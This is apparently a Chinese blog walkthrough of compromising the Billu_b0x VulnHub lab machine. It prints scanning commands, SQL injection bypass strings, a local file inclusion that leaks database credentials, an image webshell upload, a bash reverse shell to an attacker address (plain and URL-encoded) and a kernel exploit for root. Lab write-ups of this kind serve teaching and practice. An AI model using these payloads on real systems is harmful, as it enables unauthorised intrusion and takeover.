BILLU_ B0X

靶机描述

靶机地址:https://download.vulnhub.com/billu/Billu_b0x.zip

Description

This Virtual machine is using ubuntu (32 bit)
Other packages used: -

  • PHP
  • Apache
  • MySQL

This virtual machine is having medium difficulty level with tricks.

One need to break into VM using web application and from there escalate privileges to gain root access

信息收集

利用arp-scan -l命令扫描靶机IP
image.png
扫描端口

masscan --rate=10000 --ports 0-65535 192.168.75.131

image.png
扫描服务

nmap -T4 -sV -O -p 80,22 192.168.75.131

image.png
目录扫描

dirb http://192.168.75.131 /usr/share/wordlists/dirb/big.txt

image.png

Web渗透

发现登录点,且提示"Show me your SQLI skills",尝试SQL注入,使用万能密码admin' and 1=1 --失败
image.png

http://192.168.75.131/in

发现php配置文件,疑似存在文件包含漏洞
image.png

http://192.168.110.154/add

发现疑似文件上传点,尝试上传后无反应
image.png

http://192.168.110.154/test

image.png
提示:'file' parameter is empty. Please provide file path in 'file' parameter("文件"参数为空,请在"文件"参数中提供文件路径)
根据提示猜测这里存在文件包含漏洞
image.png
文件包含成功,利用同样的方式查看add.php、in.php、c.php、index.php、show.php、panel.php等文件
包含c.php成功获取到数据库账号密码"billu","b0x_billu"
image.png
包含index.php
image.png
其使用replace过滤掉\' ,构造payload 万能密码进行绕过:

un = ' or 1=1--+\'
ps = ' or 1=1--+\'

便可以成功登录绕过

http://192.168.110.154/phpmy/

image.png
成功登录phpmyadmin,又找到一个用户密码
image.png
image.png

http://192.168.75.131/

峰回路转,从网站初始进行渗透,利用账号密码成功登录
image.png
发现文件上传点
image.png
对源码进行审计,发现存在白名单限制,只能上传图片类型
image.png
但是其存在本地文件包含漏洞
image.png

GetShell

所以现在GetShell的思路有2种

  1. 通过上传图片马以及本地包含图片马+使用反弹shell的方法
  2. 通过上传图片马+包含+echo写入一句话木马GetShell的方法

第一种:通过上传图片马以及本地包含图片马+使用反弹shell的方法

image.png
image.png
image.png
image.png
反弹shell
image.png

echo "bash -i >& /dev/tcp/192.168.75.150/4444 0>&1" | bash

%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%37%35%2e%31%35%30%2f%34%34%34%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68

image.png

第二种:通过上传图片马+包含+echo写入一句话木马GetShell的方法

image.png
image.png
image.png

SSH远程登录

phpmyadmin的默认的配置⽂件是:config.inc.php,通过查看配置文件发现账号密码
image.png
image.png

提权

拿到shell后,只是普通用户,接下来进行提权
查看当前版本

cat /etc/issue

image.png

内核提权

searchsploit Ubuntu 12.04

image.png
通过蚁剑上传到/tmp目录
image.png
利用反弹Shell编译并执行

gcc 37292.c -o exp
chmod +x exp
./exp

成功提权
image.png

posted @ 2024-05-05 01:38  NoCirc1e  阅读(37)  评论(0编辑  收藏  举报